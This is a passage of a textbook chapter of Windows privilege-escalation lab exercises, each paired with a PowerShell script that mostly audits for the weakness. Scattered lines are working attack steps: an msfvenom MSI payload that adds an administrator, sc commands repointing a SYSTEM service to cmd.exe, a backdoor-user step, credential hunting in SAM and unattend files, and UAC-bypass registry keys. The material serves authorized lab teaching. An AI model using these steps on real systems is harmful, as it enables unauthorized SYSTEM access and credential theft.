Chapter 16 Exercises: Windows Exploitation and Privilege Escalation

⚖️ Legal Note: All exercises must be performed on systems you own or have explicit authorization to test. Use your Student Home Lab Windows VMs.


Exercise 1: Windows Security Model Mapping

Difficulty: Beginner | Time: 20 minutes

Explore the Windows security model on your lab VM.

  1. Run whoami /all and record every field: the user SID, each group SID with its attributes, each privilege with its state, and the integrity level (the "Mandatory Label" entry).
  2. Explain what each listed privilege allows, and why a privilege that is present but Disabled still counts: a process can enable any privilege its token already holds.
  3. Identify which privileges could be used for escalation (SeImpersonate, SeAssignPrimaryToken, SeBackup, SeRestore, SeDebug, SeTakeOwnership, SeLoadDriver and similar).
  4. Compare the output for a standard user, a local administrator in a non-elevated (UAC-filtered) prompt, and an elevated administrator. Note that the filtered token still lists BUILTIN\Administrators, but marked "Group used for deny only", and carries far fewer privileges.

Deliverable: A comparative table showing security contexts across the three privilege levels.
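Added example for Exercise 1 (not part of the original exercise text): a PowerShell function that reads the fields above from whoami's CSV output and summarizes them as one object, so a run in each of the three contexts can be dropped straight into the comparative table. It assumes only whoami.exe and Windows PowerShell 5.1 or later; the list of escalation-relevant privileges is the one from step 3.

```powershell
# Added example (not from the original page): summarize the current token from whoami's CSV
# output so the three contexts (standard user, non-elevated admin, elevated admin) compare cleanly.
function Get-SecurityContextSummary {
    # whoami can emit CSV; ConvertFrom-Csv turns the column names into properties.
    $user   = whoami /user   /fo csv | ConvertFrom-Csv
    $groups = whoami /groups /fo csv | ConvertFrom-Csv
    $privs  = whoami /priv   /fo csv | ConvertFrom-Csv

    # The integrity level is listed as a group of Type "Label",
    # e.g. "Mandatory Label\Medium Mandatory Level".
    $label = ($groups | Where-Object { $_.Type -eq 'Label' }).'Group Name'

    # A UAC-filtered administrator still carries BUILTIN\Administrators (S-1-5-32-544),
    # but with the attribute "Group used for deny only" instead of "Enabled group".
    $admin = $groups | Where-Object { $_.SID -eq 'S-1-5-32-544' }
    if (-not $admin) { $adminState = 'not a member' }
    elseif ($admin.Attributes -match 'deny only') { $adminState = 'member, filtered (deny-only SID)' }
    else { $adminState = 'member, enabled (elevated token)' }

    # Privileges commonly abused for escalation. Presence matters more than the State
    # column: a process can enable a privilege its token already holds.
    $escalation = 'SeImpersonatePrivilege', 'SeAssignPrimaryTokenPrivilege', 'SeBackupPrivilege',
                  'SeRestorePrivilege', 'SeDebugPrivilege', 'SeTakeOwnershipPrivilege',
                  'SeLoadDriverPrivilege', 'SeTcbPrivilege', 'SeCreateTokenPrivilege', 'SeManageVolumePrivilege'
    $found = foreach ($p in $privs) {
        if ($escalation -contains $p.'Privilege Name') { "$($p.'Privilege Name') [$($p.State)]" }
    }

    [pscustomobject]@{
        User                 = $user.'User Name'
        SID                  = $user.SID
        IntegrityLevel       = $label
        Administrators       = $adminState
        PrivilegeCount       = @($privs).Count
        EscalationPrivileges = if ($found) { $found -join ', ' } else { '(none)' }
    }
}

# Run once per context and keep the CSV rows for the comparative table.
Get-SecurityContextSummary | Format-List
Get-SecurityContextSummary | Export-Csv -NoTypeInformation -Path ".\context-$env:USERNAME-$PID.csv"
```

Run the same script from a standard user prompt, a non-elevated administrator prompt and an elevated one; the Administrators and EscalationPrivileges columns are where the three rows differ most.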


Exercise 2: Unquoted Service Path Discovery and Exploitation

Difficulty: Intermediate | Time: 30 minutes

  1. On your lab VM, from an elevated prompt, create a service whose binary path is unquoted and contains spaces (e.g., C:\Program Files\My Custom App\service.exe), and create the directories so the real binary is found.
  2. Configure the service to run as LocalSystem with Auto start.
  3. Identify the service with wmic (or Get-CimInstance Win32_Service where wmic is unavailable) and verify that WinPEAS reports it as well.
  4. Determine which paths Windows tries before the intended binary. For the example path these are C:\Program.exe, C:\Program Files\My.exe and C:\Program Files\My Custom.exe, in that order. On a default install neither C:\ nor C:\Program Files is writable by a standard user, so the lab must deliberately loosen the ACL on one of those directories (or put the service under a user-writable directory) for the next step to work.
  5. Place a benign executable (e.g., a copy of calc.exe renamed to one of the candidate names) at the writable injection point.
  6. Restart the service (or reboot, since it is Auto start) and verify which binary ran. Expect the start to fail with error 1053 after a timeout, because the planted binary never reports to the Service Control Manager; it still executed as SYSTEM, which is the point. A binary that writes a marker file gives cleaner proof than calc.exe, which has no desktop to appear on in session 0.
  7. Document the fix: quote the service path so the whole path is a single token.

Deliverable: Step-by-step exploitation walkthrough with screenshots.
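Added example for Exercise 2 (not part of the original exercise text): a PowerShell script that lists services with unquoted image paths, expands the candidate paths CreateProcess will try for each, and tests whether the current user can actually write to the directory each candidate would be created in. The service name VulnSvc and the setup commands in the comments are lab assumptions matching steps 1, 2 and 7.

```powershell
# Added example (not from the original page): enumerate unquoted service paths and the
# injection points they expose to the current user.

function Get-UnquotedPathCandidates {
    param([Parameter(Mandatory)][string]$ImagePath)
    # Keep everything up to and including the first ".exe"; arguments do not change the tokenising.
    $exe = ($ImagePath -split '\.exe', 2)[0] + '.exe'
    $tokens = $exe -split ' '
    # CreateProcess tries each space-delimited prefix, appending .exe when it has no extension:
    # C:\Program.exe, C:\Program Files\My.exe, C:\Program Files\My Custom.exe, then the real path.
    for ($i = 1; $i -lt $tokens.Count; $i++) {
        ($tokens[0..($i - 1)] -join ' ') + '.exe'
    }
    $exe
}

function Test-DirectoryWritable {
    param([string]$Path)
    # Get-Acl is not enough to answer "can I write here"; try to create and delete a file.
    if (-not (Test-Path -LiteralPath $Path -PathType Container)) { return $false }
    $probe = Join-Path $Path ([IO.Path]::GetRandomFileName())
    try { [IO.File]::WriteAllText($probe, ''); Remove-Item -LiteralPath $probe -Force; $true }
    catch { $false }
}

function Find-UnquotedServicePaths {
    $sysRoot = [regex]::Escape($env:SystemRoot)
    Get-CimInstance -ClassName Win32_Service |
        Where-Object { $_.PathName -and $_.PathName -notmatch '^"' -and
                       $_.PathName -match ' ' -and $_.PathName -notmatch "^$sysRoot" } |
        ForEach-Object {
            $svc = $_
            $candidates = @(Get-UnquotedPathCandidates -ImagePath $svc.PathName)
            if ($candidates.Count -le 1) { return }   # spaces only in the arguments, not in the path
            foreach ($candidate in $candidates) {
                [pscustomobject]@{
                    Service     = $svc.Name
                    StartMode   = $svc.StartMode
                    RunsAs      = $svc.StartName
                    Candidate   = $candidate
                    DirWritable = Test-DirectoryWritable -Path (Split-Path -Parent $candidate)
                }
            }
        }
}

# Lab setup for steps 1-2, from an elevated cmd.exe. sc.exe stores the path exactly as it
# receives it; the quotes below are consumed by cmd, so the stored ImagePath is unquoted.
#   mkdir "C:\Program Files\My Custom App"
#   sc create VulnSvc binPath= "C:\Program Files\My Custom App\service.exe" start= auto
# Fix for step 7 (the escaped quotes become part of the stored value):
#   sc config VulnSvc binPath= "\"C:\Program Files\My Custom App\service.exe\""

Find-UnquotedServicePaths | Format-Table -AutoSize
```

A row with DirWritable set to True is an injection point for step 5; the Candidate column is the file name the planted binary must have. Re-run the script after the step 7 fix and the service should disappear from the output.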


Exercise 3: Token Impersonation with PrintSpoofer

Difficulty: Intermediate | Time: 25 minutes

  1. Install IIS on your lab VM with a site running under an application pool identity (the default).
  2. Obtain a web shell running as the application pool identity (IIS APPPOOL\DefaultAppPool by default).
  3. Verify with whoami /priv that SeImpersonatePrivilege is present; it is listed as Enabled for service and application pool accounts.
  4. Transfer PrintSpoofer to the target and escalate to SYSTEM. PrintSpoofer relies on the Print Spooler service; if Spooler is stopped or disabled, it fails, so check its state first.
  5. Repeat the exercise with GodPotato, which does not depend on the spooler but is shipped as separate .NET 2, 3.5 and 4 builds, so pick the one matching the installed framework.
  6. Document which Potato variant works on your specific Windows build, and why the other did or did not.

Deliverable: Comparison of Potato attack variants with version compatibility notes.
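Added example for Exercise 3 (not part of the original exercise text): the precondition checks to run from the low-privil shell before choosing a variant, written so they can be dropped through a web shell as a single script file. It assumes Windows PowerShell on the target; the tool-specific facts (spooler dependency, .NET builds) are stated in the comments and should be confirmed against the README of the release you download.

```powershell
# Added example (not from the original page): what to check before picking a Potato variant.
# From a web shell: powershell -ExecutionPolicy Bypass -File .\Test-PotatoPreconditions.ps1
function Test-PotatoPreconditions {
    $privs = whoami /priv /fo csv | ConvertFrom-Csv
    # Every Potato variant needs one of these two; IIS app pool identities hold SeImpersonatePrivilege.
    $imp = $privs | Where-Object { $_.'Privilege Name' -in 'SeImpersonatePrivilege', 'SeAssignPrimaryTokenPrivilege' }
    $os = Get-CimInstance -ClassName Win32_OperatingSystem
    # PrintSpoofer talks to the spooler's named pipe, so it needs the Spooler service running.
    $spooler = Get-Service -Name Spooler -ErrorAction SilentlyContinue
    # GodPotato is distributed as .NET 2 / 3.5 / 4 builds; the installed framework decides which to use.
    $net4 = (Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full' `
                -ErrorAction SilentlyContinue).Release
    $net35 = (Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP\v3.5' `
                -ErrorAction SilentlyContinue).Install

    [pscustomobject]@{
        User               = (whoami)
        ImpersonationPrivs = if ($imp) { ($imp | ForEach-Object { "$($_.'Privilege Name')=$($_.State)" }) -join '; ' }
                             else { '(none: Potato attacks will not work from this token)' }
        OS                 = "$($os.Caption) $($os.Version) (build $($os.BuildNumber))"
        SpoolerRunning     = [bool]($spooler -and $spooler.Status -eq 'Running')
        DotNet4Release     = $net4          # 378389 or higher means .NET 4.5 or later is installed
        DotNet35Installed  = ($net35 -eq 1)
        Is64Bit            = [Environment]::Is64BitOperatingSystem
    }
}

Test-PotatoPreconditions | Format-List
```

If SpoolerRunning is False, skip straight to GodPotato (or another spooler-independent variant) and note in the deliverable that PrintSpoofer was ruled out by configuration rather than by OS version. Record the build number from the OS field next to each result; that is the version-compatibility note the deliverable asks for.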


Exercise 4: Service Permission Exploitation

Difficulty: Intermediate | Time: 30 minutes

  1. Create a vulnerable service whose DACL grants Authenticated Users SERVICE_CHANGE_CONFIG (the DC right in SDDL), plus SERVICE_START and SERVICE_STOP so the standard user can restart it.
  2. As a standard user, use sc config to point the service binary path at a payload; a command that writes whoami output to a world-readable file is sufficient proof.
  3. Restart the service and verify SYSTEM-level execution. If the user lacks SERVICE_START and SERVICE_STOP, an Auto-start service still runs the new binary at the next reboot.
  4. Restore the original service configuration.
  5. Fix the service permissions with sc sdset (sc sdshow prints the current descriptor) by removing the Authenticated Users ACE.

Deliverable: Complete exploitation and remediation documentation.
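Added example for Exercise 4 (not part of the original exercise text): a PowerShell audit that parses the SDDL printed by sc.exe sdshow and flags Allow ACEs granting control of a service to broad groups, together with the lab commands for steps 1 to 5 in the comments. The service name VulnSvc, the payload command and the output file path are lab assumptions; the SDDL strings use the standard service rights abbreviations.

```powershell
# Added example (not from the original page): find services whose DACL lets ordinary users
# reconfigure them, and the sc.exe commands that create and then fix such a service.

# Service rights (SDDL two-letter form) that let the holder reconfigure or take over the service:
# DC = SERVICE_CHANGE_CONFIG, WD = WRITE_DAC, WO = WRITE_OWNER, GA/GW = GENERIC_ALL/GENERIC_WRITE.
$DangerousRights = 'DC', 'WD', 'WO', 'GA', 'GW'
# The same rights as a bit mask, for ACEs that sc.exe prints in hexadecimal form.
$DangerousMask = 0x2 -bor 0x40000 -bor 0x80000 -bor 0x10000000 -bor 0x40000000
# Trustees that amount to "any user": Authenticated Users, Users, Everyone, Interactive.
$BroadTrustees = 'AU', 'BU', 'WD', 'IU', 'S-1-5-11', 'S-1-5-32-545', 'S-1-1-0', 'S-1-5-4'

function Get-ServiceAces {
    param([Parameter(Mandatory)][string]$Name)
    # sdshow prints a blank line and then the descriptor; a missing service yields an error line instead.
    $sddl = (sc.exe sdshow $Name | Where-Object { $_ -match '^D:' }) -join ''
    if (-not $sddl) { return }
    $dacl = ($sddl -split 'S:', 2)[0]            # drop the SACL part, if any
    foreach ($m in [regex]::Matches($dacl, '\(([^)]*)\)')) {
        $f = $m.Groups[1].Value -split ';'       # type;flags;rights;objguid;inhguid;trustee
        if ($f[0] -ne 'A') { continue }          # only Allow ACEs matter here
        $rights = $f[2]; $trustee = $f[5]
        if ($rights -like '0x*') {
            $weak = ([int64]$rights -band $DangerousMask) -ne 0
        } else {
            $codes = for ($i = 0; $i + 1 -lt $rights.Length; $i += 2) { $rights.Substring($i, 2) }
            $weak = @($codes | Where-Object { $_ -in $DangerousRights }).Count -gt 0
        }
        [pscustomobject]@{
            Service  = $Name
            Trustee  = $trustee
            Rights   = $rights
            Control  = $weak
            Exposed  = $weak -and ($trustee -in $BroadTrustees)
        }
    }
}

function Find-WeakServices {
    Get-Service | ForEach-Object { Get-ServiceAces -Name $_.Name } | Where-Object Exposed
}

# Step 1, from an elevated cmd.exe: the third ACE grants Authenticated Users (AU) DC (change config)
# plus RP/WP (start/stop) on top of the default read rights.
#   sc create VulnSvc binPath= "C:\Windows\System32\cmd.exe" start= demand
#   sc sdset VulnSvc D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCDCLCSWRPWPDTLOCRRC;;;AU)
# Steps 2-3, as the standard user (the start fails with error 1053, but the command has already run as SYSTEM):
#   sc config VulnSvc binPath= "cmd.exe /c whoami > C:\Users\Public\vulnsvc.txt"
#   sc start VulnSvc
# Step 5, remediation: replace the descriptor with the default read-only entries for interactive and service users.
#   sc sdset VulnSvc D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)

Find-WeakServices | Format-Table -AutoSize
```

Before the sdset in step 5, capture the output of sc sdshow VulnSvc for the report; after it, VulnSvc should no longer appear in Find-WeakServices, and sc config from the standard user should fail with access denied.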


Exercise 5: AlwaysInstallElevated Exploitation

Difficulty: Beginner | Time: 20 minutes

  1. Enable AlwaysInstallElevated in both locations, HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer and HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer, as a DWORD value of 1. Both must be set; one alone has no effect. The HKCU value has to be in the hive of the user who will run the installer, so set it as that user or through the Group Policy editor (User Configuration > Administrative Templates > Windows Components > Windows Installer > "Always install with elevated privileges", plus the same setting under Computer Configuration).
  2. Generate a malicious MSI using msfvenom.
  3. Install the MSI as a standard user with msiexec and verify SYSTEM execution.
  4. Disable AlwaysInstallElevated and verify the fix: the same MSI must now install with the user's rights only, or fail.

Deliverable: Registry configuration screenshots and exploitation proof.
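Added example for Exercise 5 (not part of the original exercise text): a PowerShell check that reports the two values separately and only calls the host exploitable when both are set, plus a helper for steps 1 and 4. The key paths are the documented policy locations; the caveat about whose HKCU hive is being written is the one that most often makes this lab fail.

```powershell
# Added example (not from the original page): AlwaysInstallElevated is only effective when the
# machine key AND the per-user key both hold the value 1.
$InstallerPolicyKeys = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
                       'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'

function Test-AlwaysInstallElevated {
    $rows = foreach ($key in $InstallerPolicyKeys) {
        # A missing key or value reads as $null, which is the secure state.
        $value = (Get-ItemProperty -Path $key -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
        [pscustomobject]@{ Key = $key; Value = $value; Enabled = ($value -eq 1) }
    }
    [pscustomobject]@{
        Exploitable = (@($rows | Where-Object Enabled).Count -eq $InstallerPolicyKeys.Count)
        Keys        = $rows
    }
}

# Steps 1 and 4. HKCU here is the hive of the account running this function, so run it as the
# standard user for the HKCU half (the Policies subtree is normally not user-writable, in which
# case use gpedit.msc as described in step 1) and elevated for the HKLM half.
function Set-AlwaysInstallElevated {
    param([Parameter(Mandatory)][bool]$Enabled)
    foreach ($key in $InstallerPolicyKeys) {
        if ($Enabled) {
            New-Item -Path $key -Force | Out-Null
            New-ItemProperty -Path $key -Name AlwaysInstallElevated -PropertyType DWord -Value 1 -Force | Out-Null
        } else {
            Remove-ItemProperty -Path $key -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
        }
    }
    Test-AlwaysInstallElevated
}

(Test-AlwaysInstallElevated).Keys | Format-Table -AutoSize
"Exploitable: $((Test-AlwaysInstallElevated).Exploitable)"
```

For steps 2 and 3 a minimal payload is enough, for example msfvenom -p windows/x64/exec CMD="net localgroup administrators lowpriv /add" -f msi -o elevate.msi on the attack machine (lowpriv being the assumed lab user name), then msiexec /quiet /qn /i elevate.msi as that user; net localgroup administrators afterwards is the proof of SYSTEM execution.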


Exercise 6: DLL Hijacking Lab

Difficulty: Advanced | Time: 45 minutes

  1. Use Process Monitor (ProcMon) to capture DLL loading while the target service starts (restart the service during the capture, or enable boot logging for services you cannot restart).
  2. Filter for Operation is CreateFile, Result is NAME NOT FOUND and Path ends with .dll, and note which process and which directory each request came from.
  3. Walk the DLL search order for that binary (application directory, System32, System, the Windows directory, the working directory and then PATH, with SafeDllSearchMode enabled) and find the first directory in that order that a standard user can write to. Skip any DLL listed under KnownDLLs, which is always loaded from System32.
  4. Build a DLL of the service's bitness whose DllMain writes a log line on DLL_PROCESS_ATTACH (rather than spawning a shell, for safety).
  5. Place the DLL under the missing name and verify it is loaded when the service starts: ProcMon shows a Load Image event for your path, and the log file confirms execution.

Deliverable: ProcMon filter setup documentation and DLL hijacking proof.
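Added example for Exercise 6 (not part of the original exercise text): a PowerShell function that, given the DLL name ProcMon reported as NAME NOT FOUND and the service binary's path, lists the directories the loader will probe in search order, marks KnownDLLs, and picks the first writable directory that precedes any real copy. The binary and DLL names at the bottom are placeholders to replace with the ones from your capture; the search order implemented is the documented default one and the ProcMon trace remains the ground truth for a specific binary.

```powershell
# Added example (not from the original page): which directory on the DLL search path can the
# current user plant a DLL in, and does it come before any real copy?

function Get-DllSearchOrder {
    param(
        [Parameter(Mandatory)][string]$ExePath,   # full path of the service binary
        [Parameter(Mandatory)][string]$DllName    # e.g. 'missing.dll'
    )
    # KnownDLLs are always mapped from System32 and cannot be hijacked from the application directory.
    $knownKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs'
    $knownDlls = (Get-ItemProperty -Path $knownKey).PSObject.Properties |
                 Where-Object { $_.Name -notlike 'PS*' -and $_.Value -is [string] } |
                 ForEach-Object { $_.Value }
    $isKnown = $DllName -in $knownDlls

    # SafeDllSearchMode (enabled unless the value is 0) moves the current directory
    # from second place to after the Windows directory.
    $sessionMgr = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager'
    $safeMode = ($sessionMgr.SafeDllSearchMode -ne 0)

    # A service starts with System32 as its working directory and resolves PATH from the
    # machine environment, not from the user running this script.
    $appDir = Split-Path -Parent $ExePath
    $cwd = "$env:SystemRoot\System32"
    $machinePath = [Environment]::GetEnvironmentVariable('Path', 'Machine') -split ';' | Where-Object { $_ }

    $order = @($appDir)
    if (-not $safeMode) { $order += $cwd }
    $order += "$env:SystemRoot\System32", "$env:SystemRoot\System", $env:SystemRoot
    if ($safeMode) { $order += $cwd }
    $order += $machinePath

    $position = 0
    foreach ($dir in $order) {
        $position++
        $probe = Join-Path $dir ([IO.Path]::GetRandomFileName())
        try { [IO.File]::WriteAllText($probe, ''); Remove-Item -LiteralPath $probe -Force; $writable = $true }
        catch { $writable = $false }
        [pscustomobject]@{
            Position   = $position
            Directory  = $dir
            DllPresent = Test-Path -LiteralPath (Join-Path $dir $DllName)
            Writable   = $writable
            KnownDll   = $isKnown
        }
    }
}

function Find-DllHijackPoint {
    param([Parameter(Mandatory)][string]$ExePath, [Parameter(Mandatory)][string]$DllName)
    foreach ($entry in Get-DllSearchOrder -ExePath $ExePath -DllName $DllName) {
        if ($entry.KnownDll)   { return $null }   # resolved from System32 regardless of the search path
        if ($entry.DllPresent) { return $null }   # a real copy earlier in the order wins
        if ($entry.Writable)   { return $entry }  # first writable directory before any real copy
    }
}

# Placeholder binary and DLL name; substitute the ones from your ProcMon capture.
Get-DllSearchOrder -ExePath 'C:\Program Files\Lab Service\labsvc.exe' -DllName 'labhelper.dll' | Format-Table -AutoSize
Find-DllHijackPoint -ExePath 'C:\Program Files\Lab Service\labsvc.exe' -DllName 'labhelper.dll'
```

Run it as the standard user, not elevated, or the Writable column answers the wrong question. A PATH entry that points to a user-writable directory shows up here as a hijack point for every service that loads a missing DLL by name, which is worth its own line in the report.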


Exercise 7: Credential Hunting Methodology

Difficulty: Beginner | Time: 25 minutes

Systematically search for credentials on your lab VM.

  1. List saved credentials with cmdkey /list (Credential Manager entries, usable with runas /savecred).
  2. Search for unattend.xml and sysprep.xml under C:\Windows\Panther, C:\Windows\Panther\Unattend and C:\Windows\System32\Sysprep; passwords in them may be base64-encoded or plaintext.
  3. Examine PowerShell history in every profile you can read (AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt).
  4. Check for AutoLogon credentials under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon (AutoAdminLogon, DefaultUserName, DefaultPassword).
  5. Examine SAM and SYSTEM backup copies in C:\Windows\Repair and C:\Windows\System32\config\RegBack, and record whether your user can actually read them, not only whether they exist.
  6. Search IIS configuration files (web.config files under C:\inetpub and applicationHost.config) for connection strings and credentials.
  7. Document each finding and its exploitation potential.

Deliverable: Credential hunting checklist with findings.
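Added example for Exercise 7 (not part of the original exercise text): the checklist as a PowerShell script that records every location, including the ones that turn out empty or unreadable, since those rows belong in the findings table too. Paths are the standard ones from the steps above; the search patterns are assumptions you should extend for your lab.

```powershell
# Added example (not from the original page): run the credential checklist and collect one row per location.
function Invoke-CredentialHunt {
    $results = New-Object System.Collections.Generic.List[object]
    $add = { param($Check, $Location, $Detail)
             $results.Add([pscustomobject]@{ Check = $Check; Location = $Location; Detail = $Detail }) }

    # 1. Credential Manager entries usable with "runas /savecred".
    $targets = cmdkey /list | Where-Object { $_ -match 'Target:' } | ForEach-Object { $_.Trim() }
    & $add 'cmdkey' 'Credential Manager' ($(if ($targets) { $targets -join '; ' } else { 'no saved credentials' }))

    # 2. Unattended-install answer files; passwords sit in <Password><Value>, often base64-encoded.
    $unattend = "$env:SystemRoot\Panther\Unattend.xml", "$env:SystemRoot\Panther\Unattend\Unattend.xml",
                "$env:SystemRoot\System32\Sysprep\Unattend.xml", "$env:SystemRoot\System32\Sysprep\Sysprep.xml",
                "$env:SystemRoot\System32\Sysprep\Panther\Unattend.xml"
    foreach ($f in $unattend) {
        if (Test-Path -LiteralPath $f) {
            $hits = Select-String -LiteralPath $f -Pattern 'Password|<Value>' -ErrorAction SilentlyContinue
            & $add 'unattend' $f "present, $(@($hits).Count) candidate line(s)"
        }
    }

    # 3. PSReadLine history for every profile the current user can read.
    Get-ChildItem -Path "$env:SystemDrive\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -ErrorAction SilentlyContinue |
        ForEach-Object {
            $hits = Select-String -LiteralPath $_.FullName -Pattern 'password|passwd|pwd|secret|ConvertTo-SecureString|-cred' -ErrorAction SilentlyContinue
            & $add 'ps-history' $_.FullName "$(@($hits).Count) suspicious line(s)"
        }

    # 4. AutoLogon: the password is only exposed when DefaultPassword is stored as a plain registry value.
    $wl = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
    & $add 'autologon' 'HKLM\...\Winlogon' "AutoAdminLogon=$($wl.AutoAdminLogon) DefaultUserName=$($wl.DefaultUserName) DefaultPassword=$(if ($wl.DefaultPassword) { '<set>' } else { '<absent>' })"

    # 5. Hive backups: record existence and whether this user can actually open them.
    foreach ($f in "$env:SystemRoot\Repair\SAM", "$env:SystemRoot\Repair\SYSTEM",
                   "$env:SystemRoot\System32\config\RegBack\SAM", "$env:SystemRoot\System32\config\RegBack\SYSTEM") {
        if (Test-Path -LiteralPath $f) {
            try { [IO.File]::OpenRead($f).Dispose(); $readable = 'readable' } catch { $readable = 'exists but not readable' }
            & $add 'hive-backup' $f "$readable, $((Get-Item -LiteralPath $f).Length) bytes"
        }
    }

    # 6. IIS: web.config files carry connection strings; applicationHost.config can carry app pool credentials.
    $iisFiles = @(Get-ChildItem -Path "$env:SystemDrive\inetpub" -Recurse -Filter web.config -ErrorAction SilentlyContinue) +
                @(Get-Item -LiteralPath "$env:SystemRoot\System32\inetsrv\config\applicationHost.config" -ErrorAction SilentlyContinue)
    foreach ($f in $iisFiles) {
        $hits = Select-String -LiteralPath $f.FullName -Pattern 'connectionString|password=' -ErrorAction SilentlyContinue
        & $add 'iis-config' $f.FullName "$(@($hits).Count) candidate line(s)"
    }

    $results
}

Invoke-CredentialHunt | Format-Table -AutoSize -Wrap
```

A zero-byte RegBack hive (the default on current Windows 10 and 11, which no longer populate that folder) is a finding with no value; a readable SAM copy in C:\Windows\Repair is the one that matters, and the report should say which of the two it found.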


Exercise 8: UAC Bypass Techniques

Difficulty: Intermediate | Time: 30 minutes

  1. Log in as a local administrator and verify with whoami /groups that the integrity level is Medium and that BUILTIN\Administrators is marked "Group used for deny only".
  2. Attempt an administrative action without elevation (expect failure).
  3. Use the fodhelper.exe bypass to get a High integrity shell. fodhelper.exe auto-elevates and resolves the ms-settings protocol handler through HKCU\Software\Classes, which a medium-integrity process can write.
  4. Verify the result with whoami /groups: the integrity level should now read High and the Administrators group should be enabled.
  5. Test the eventvwr.exe bypass (which read the handler from HKCU\Software\Classes\mscfile\shell\open\command) as an alternative. It was fixed in Windows 10 1703, so on current builds expect it to fail, and record the build you tested on.
  6. Document the registry keys involved in each bypass, and note that Microsoft Defender detects and reverts the common implementations of both, so the lab may need real-time protection turned off for this exercise.

Deliverable: UAC bypass documentation with before/after integrity level evidence.
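Added example for Exercise 8 (not part of the original exercise text): a PowerShell helper that captures the integrity level for the before/after evidence and audits, then removes, the per-user registry keys the two bypasses plant. It does not perform the bypass itself; steps 3 and 5 do that. The key paths are the documented ones for the two techniques.

```powershell
# Added example (not from the original page): before/after integrity evidence and an audit of the
# HKCU keys that the fodhelper and eventvwr bypasses depend on.
function Get-IntegrityLevel {
    # whoami lists the integrity level as a group of type "Label".
    (whoami /groups /fo csv | ConvertFrom-Csv | Where-Object { $_.Type -eq 'Label' }).'Group Name'
}

# fodhelper.exe runs the command in the default value of ms-settings\Shell\Open\command when an
# empty DelegateExecute value is present; eventvwr.exe used the mscfile handler the same way.
$UacBypassKeys = @(
    [pscustomobject]@{ Technique = 'fodhelper.exe'; Key = 'HKCU:\Software\Classes\ms-settings\Shell\Open\command'; Root = 'HKCU:\Software\Classes\ms-settings' }
    [pscustomobject]@{ Technique = 'eventvwr.exe';  Key = 'HKCU:\Software\Classes\mscfile\shell\open\command';     Root = 'HKCU:\Software\Classes\mscfile' }
)

function Get-UacBypassArtifacts {
    foreach ($entry in $UacBypassKeys) {
        $present = Test-Path -Path $entry.Key
        $props = if ($present) { Get-ItemProperty -Path $entry.Key } else { $null }
        [pscustomobject]@{
            Technique       = $entry.Technique
            Key             = $entry.Key
            Present         = $present
            Command         = if ($props) { $props.'(default)' } else { $null }
            DelegateExecute = [bool]($props -and $props.PSObject.Properties['DelegateExecute'])
        }
    }
}

function Remove-UacBypassArtifacts {
    # Neither progid exists under HKCU on a clean system, so the whole subtree can go.
    foreach ($entry in $UacBypassKeys) {
        if (Test-Path -Path $entry.Root) { Remove-Item -Path $entry.Root -Recurse -Force; "removed $($entry.Root)" }
    }
}

"Integrity level: $(Get-IntegrityLevel)"
Get-UacBypassArtifacts | Format-Table -AutoSize
```

Run the integrity line in the original medium-integrity prompt and again in the shell the bypass spawns; run Get-UacBypassArtifacts from either, since both read the same HKCU hive, and Remove-UacBypassArtifacts once the screenshots are taken.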


Exercise 9: Windows Exploit Suggester

Difficulty: Beginner | Time: 20 minutes

  1. Capture systeminfo output from your lab VM to a file; it lists the OS version, build and installed hotfix KBs, which is what the tool matches on.
  2. Run Windows Exploit Suggester - Next Generation (wesng) against the file, after updating its definitions.
  3. Filter results for "Elevation of Privilege" impact.
  4. For each suggested exploit, verify that it applies to your specific build and that the fix is really absent; wesng reasons by KB number, so a newer cumulative update that includes the fix can still leave an entry in the output.
  5. Create a prioritized list of exploits by likelihood of success and by availability of a public, working exploit for your build.

Deliverable: Exploit assessment report with prioritized findings.


Exercise 10: WinPEAS vs. PowerUp Comparison

Difficulty: Beginner | Time: 30 minutes

  1. Run WinPEAS (executable version) on your lab VM.
  2. Run PowerUp's Invoke-AllChecks in PowerShell.
  3. Run Seatbelt with -group=all.
  4. Compare findings across all three tools.
  5. Identify findings unique to each tool.
  6. Evaluate which tool is most effective in different scenarios (e.g., when PowerShell is restricted, when AV is active).

Deliverable: Comparative analysis with recommendation matrix.


Exercise 11: Scheduled Task Exploitation

Difficulty: Intermediate | Time: 25 minutes

  1. Create a scheduled task that runs a script as SYSTEM on a short interval.
  2. Make the script file writable by standard users. The parent directory's ACL matters too: delete rights on the directory let a user replace the file regardless of the file's own permissions.
  3. As a standard user, modify the script to add a backdoor user. Unless the task's own security descriptor lets your user run it, you have to wait for the schedule rather than trigger it.
  4. Wait for the scheduled task to run and verify the new user was created.
  5. Fix the vulnerability by correcting the file and directory permissions.

Deliverable: Exploitation proof and remediation steps.
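Added example for Exercise 11 (not part of the original exercise text): a PowerShell audit that lists enabled tasks running as SYSTEM and checks whether the current user can modify the executable, or a script named in the task's arguments, plus the lab setup and remediation for steps 1, 2 and 5 in the comments. It needs the ScheduledTasks module (Windows 8 / Server 2012 and later); the task name LabCleanup and the C:\Tasks path are lab assumptions.

```powershell
# Added example (not from the original page): which SYSTEM tasks run something this user can edit?
function Test-FileWritable {
    param([string]$Path)
    if (-not (Test-Path -LiteralPath $Path -PathType Leaf)) { return $false }
    # Open for write without truncating; success means the ACL grants write access to this user.
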